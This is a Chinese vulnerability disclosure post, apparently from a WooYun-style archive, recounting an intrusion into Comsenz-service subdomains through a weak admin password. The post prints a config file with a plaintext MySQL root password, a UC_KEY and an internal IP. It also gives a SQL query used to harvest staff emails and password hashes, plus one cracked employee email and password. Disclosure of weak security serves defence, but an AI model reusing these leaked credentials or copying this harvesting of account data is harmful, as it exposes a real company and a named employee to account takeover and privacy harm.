对康创联盛的一次安全检测（成功getshell并可访问数据库）

### 简要描述： 不得不说,我真是倒霉 ### 详细说明： 本来是打算睡觉的,结果忽然想到那天看到的一个论坛,新架设的,问了下基友,未能getshell 原谅我地址已经忘了... 于是乎就继续看了一下 继续跑一下三级域名,发现admin.hd.comsenz-service.com 手工测试一下弱口令,运气还不错 test test123 进来了 [<img src="https://images.seebug.org/upload/201603/271221413960c8b906f5ab679c2f0fab9b55f56c.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/271221413960c8b906f5ab679c2f0fab9b55f56c.png) 有pic 有j8 [<img src="https://images.seebug.org/upload/201603/27074248373c0f355d69201d6c134f9e29e5bda8.png" alt="QQ截图20160327074227.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/27074248373c0f355d69201d6c134f9e29e5bda8.png) 涉及多个分站,不过多叙述 进来发现只是个虚拟机啊,还不能执行命令,懒得提权了,就随手翻了翻配置 ``` 127.0.0.1 localhost VM_138_131_centos 127.0.0.1 www.comsenz-service.com 127.0.0.1 thek.pm.comsenz-service.com 127.0.0.1 sznews.pm.comsenz-service.com ``` [<img src="https://images.seebug.org/upload/201603/27074421914faa86a45af781402b23b6b74522c2.png" alt="QQ截图20160327074402.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/27074421914faa86a45af781402b23b6b74522c2.png) 翻到了root,连上 ``` <?php define('UC_CONNECT', 'mysql'); define('UC_DBHOST', 'localhost'); define('UC_DBUSER', 'root'); define('UC_DBPW', 'q1w2e3r4_huoban'); define('UC_DBNAME', 'cnr_mz'); define('UC_DBCHARSET', 'utf8'); define('UC_DBTABLEPRE', '`cnr_mz`.uc_'); define('UC_DBCONNECT', 0); define('UC_CHARSET', 'utf-8'); define('UC_KEY', 'G1c1NaQ1w39cjaz9P4g5tdu0P5z1b3Xd37l9t2O8u0bco1wdI579gfBbv1R3l0y2'); define('UC_API', 'http://minzu.pm.comsenz-service.com/uc'); define('UC_APPID', '4'); define('UC_IP', '182.254.130.60'); define('UC_PPP', 20); ?> ``` [<img src="https://images.seebug.org/upload/201603/27074534382aeb621b3c4b1090f23d3686d11c0f.png" alt="QQ截图20160327074518.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/27074534382aeb621b3c4b1090f23d3686d11c0f.png) 75个库,信息众多,不一一列举 然后全部收集了一遍邮箱账号密码信息 ``` SELECT email,`password`,salt FROM pre_ucenter_members WHERE email LIKE "%comsenz%" ``` [<img src="https://images.seebug.org/upload/201603/27074734b8fd493c5999df136a11ab304df29aa8.png" alt="QQ截图20160327071445.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/27074734b8fd493c5999df136a11ab304df29aa8.png) [<img src="https://images.seebug.org/upload/201603/27074821960eb58ca5ab8aa891ac979b536a63d5.png" alt="QQ截图20160327074804.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/27074821960eb58ca5ab8aa891ac979b536a63d5.png) 去了下重复 也就那么多了 cmd5能解密的少的可怜...哭 但是也还是进来了几个 wangwei@comsenz-service.com 790602ww [<img src="https://images.seebug.org/upload/201603/270749476e65437a6b7b73e7a4d8a25c1edda687.png" alt="QQ截图20160327073357.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/270749476e65437a6b7b73e7a4d8a25c1edda687.png) [<img src="https://images.seebug.org/upload/201603/270749518a143e62b0f86104afd43202a3f8e1cb.png" alt="QQ截图20160327073822.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/270749518a143e62b0f86104afd43202a3f8e1cb.png) 没能翻到想要的东西,不开心,睡觉~ ### 漏洞证明： [<img src="https://images.seebug.org/upload/201603/27075305c8fc6620cddf1f072e840cf167f90ae7.png" alt="QQ截图20160327074227.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/27075305c8fc6620cddf1f072e840cf167f90ae7.png) [<img src="https://images.seebug.org/upload/201603/2707531188b027001ab31d3c991485eb7f3ceeda.png" alt="QQ截图20160327074518.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/2707531188b027001ab31d3c991485eb7f3ceeda.png)